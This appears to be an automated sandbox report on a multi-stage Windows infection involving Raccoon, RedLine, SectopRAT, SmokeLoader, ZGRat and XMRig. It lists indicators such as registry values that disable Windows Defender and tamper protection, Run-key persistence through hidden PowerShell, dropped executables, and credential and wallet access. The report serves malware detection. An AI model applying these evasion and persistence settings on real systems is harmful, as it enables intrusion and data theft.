Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\F0A.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\DB23.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\F15C.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\D561.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D61D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D9D8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DB23.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DD37.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F15C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F2C4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\14C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F0A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\138F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe N/A
N/A N/A C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F0A.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F0A.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F0A.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F0A.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F0A.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\D561.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\F2C4.exe'\"" C:\Users\Admin\AppData\Local\Temp\F2C4.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Detected potential entity reuse from brand paypal.

phishing paypal

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\KAudioConverter\is-T7FU9.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-IRTME.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-9PU0U.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-O0T2P.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-G4I98.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-2RNET.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-K3JDO.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-44EL2.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-9GL8I.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-AE2KE.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-7V03K.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-F1JTM.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-HMGJ2.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-PNEBC.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\KAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files (x86)\KAudioConverter\is-DGRNM.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
